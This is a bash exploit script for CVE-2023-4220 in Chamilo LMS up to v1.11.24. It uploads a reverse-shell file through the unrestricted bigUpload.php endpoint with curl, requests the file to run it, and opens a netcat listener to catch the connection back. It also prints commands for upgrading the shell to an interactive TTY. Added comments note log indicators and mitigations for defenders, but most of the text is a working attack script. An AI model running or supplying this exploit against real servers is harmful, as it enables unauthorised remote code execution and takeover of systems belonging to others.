CVE-2023-4220.sh
# Exploit Title : Chamilo LMS CVE-2023-4220 Exploit
# Date : 11/28/2023
# Exploit Author : Ziad Sakr (@Ziad-Sakr)
# Version : ≤v1.11.24
# CVE : 2023-4220
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2023-4220
#
# Description :
# This is an exploit for the unrestricted file upload in the big file upload functionality of Chamilo LMS
# <= v1.11.24, located at "/main/inc/lib/javascript/bigupload/inc/bigUpload.php". Attackers can
# obtain remote code execution by uploading a web shell.
#
# Usage: ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
#!/bin/bash
# Option values; each stays empty until the option parser fills it in
reverse_file=
host_link=
port=
# ANSI colour escapes, expanded later by `echo -e`: reset, green, red
NC='\033[0m'
GREEN='\033[0;32m'
RED='\033[0;31m'
# Print the synopsis and option list to stdout, then terminate the script.
# Globals:   GREEN, NC (read) - colour escapes interpreted by `echo -e`
# Arguments: none
# Returns:   never returns; exits with status 1
usage() {
  # Colour is switched on for the synopsis line and reset before the option list
  echo -e "${GREEN}"
  printf 'Usage: %s -f reverse_file -h host_link -p port_in_the_reverse_file\n' "$0"
  echo -e "${NC}"
  printf '%s\n' \
    'Options:' \
    ' -f Path to the reverse file' \
    ' -h Host link where the file will be uploaded' \
    ' -p Port for the reverse shell'
  exit 1
}
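# Parse command-line options into reverse_file, host_link and port.
# The leading ':' in the optstring selects getopts' silent mode. Without it the
# ':' arm below is never reached (a missing argument is reported as '?'), and
# OPTARG is not set for an unknown option, so both messages would print an
# empty option name next to getopts' own diagnostic.
while getopts ":f:h:p:" opt; do
  case "$opt" in
    f)
      reverse_file=$OPTARG
      ;;
    h)
      host_link=$OPTARG
      ;;
    p)
      port=$OPTARG
      ;;
    \?)
      # Unknown option letter; in silent mode OPTARG holds that letter
      echo -e "${RED}"
      echo "Invalid option: -$OPTARG" >&2
      usage
      ;;
    :)
      # Option given without its required value; OPTARG holds the option letter
      echo -e "${RED}"
      echo "Option -$OPTARG requires an argument." >&2
      usage
      ;;
  esac
done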
# Refuse to continue unless -f, -h and -p were all given a non-empty value
if ! [[ -n "$reverse_file" && -n "$host_link" && -n "$port" ]]; then
  echo -e "${RED}"
  echo "All options -f, -h, and -p are required."
  usage
fi
# Step 1 - upload. Sends the local file named by -f as the multipart form field
# "bigUploadFile" to bigUpload.php with action=post-unsupported. The command
# carries no cookie or credential options.
# Defender view: this path plus the action parameter in web-server access logs
# is the primary indicator of an attempt, as is any unexpected file appearing
# under .../bigupload/files/. The header lists Chamilo LMS <= v1.11.24 as
# affected; upgrading past the affected releases and making sure the web server
# does not execute scripts from that upload directory are the relevant mitigations.
echo -e "${GREEN}"
curl -F "bigUploadFile=@$reverse_file" "$host_link/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
echo
echo
# Operator hints only: the lines below are printed to the terminal, not executed
echo -e "# Use This leter For Interactive TTY ;) " "${RED}"
echo "# python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"
echo "# export TERM=xterm"
echo "# CTRL + Z"
echo "# stty raw -echo; fg"
echo -e "${GREEN}"
echo "# Starting Reverse Shell On Port $port . . . . . . ."
sleep 3
# Step 2 - trigger. Requests the uploaded file from the files/ directory in the
# background. Per the header description, the server executing that file is
# what yields code execution.
# Defender view: a GET for a script under .../bigupload/files/ shortly after the
# upload request is the second log indicator.
curl "$host_link/main/inc/lib/javascript/bigupload/files/$reverse_file" &
echo -e "${NC}"
# Local listener on the -p port. Presumably the uploaded file connects back to
# this port; the script never inspects the file, so confirm against the payload.
# An outbound connection from the web server right after the two requests is a
# network-level indicator, and egress filtering on the server limits it.
# NOTE(review): $port is unquoted here, so it is subject to word splitting.
nc -lnvp $port